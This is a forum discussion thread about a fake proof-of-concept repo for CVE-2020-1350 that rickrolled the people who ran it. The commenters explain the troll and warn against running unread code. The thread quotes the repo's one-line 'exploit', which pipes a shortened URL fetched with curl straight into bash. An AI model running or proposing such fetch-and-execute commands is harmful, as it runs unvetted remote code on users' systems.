That's my take. Just random garbage. There is a thread of something in there, but I don't have the time/ energy to quite get it. Something about a fake hack, Rickrolling, and piping curl to the shell. Beyond that I gave up because it's too poorly organized.

Yeah they completely fail to explain the context.

CVE-2020-1350 is a real vulnerability that was published just yesterday:

https://nvd.nist.gov/vuln/detail/CVE-2020-1350

It's a brand new vuln so people would be interested in a proof of concept. The author created a git repo that was nominally a PoC exploit for this vulnerability but was really just a troll, and publicized it on twitter.

Some people ran the "proof of concept" code without reading it first and got trolled. If the author had been malicious they could have done something much worse than rickrolling.

The repo also contains a real fix for the vulnerability.

This is a particularly "amusing" troll because the sort of people who keep up with CVEs and look for proof-of-concept exploits should really know better than to run random code they just got off GitHub without checking what it does.

It's obvious with the most cursory examination of the code in the repo that you shouldn't run it, exploit.sh contains:

   curl -L https://bit.ly/3exifav | bash

Looks to be someone posted a fake exploit and people ran it.

You need a few clicks to get to the meat (Rick Ashley of course) https://github.com/ZephrFish/CVE-2020-1350/blob/master/explo...

The actual meat: https://raw.githubusercontent.com/keroserene/rickrollrc/mast...

I came here hoping that someone would explain what is really going on. Now I feel a bit better since I am not the only one.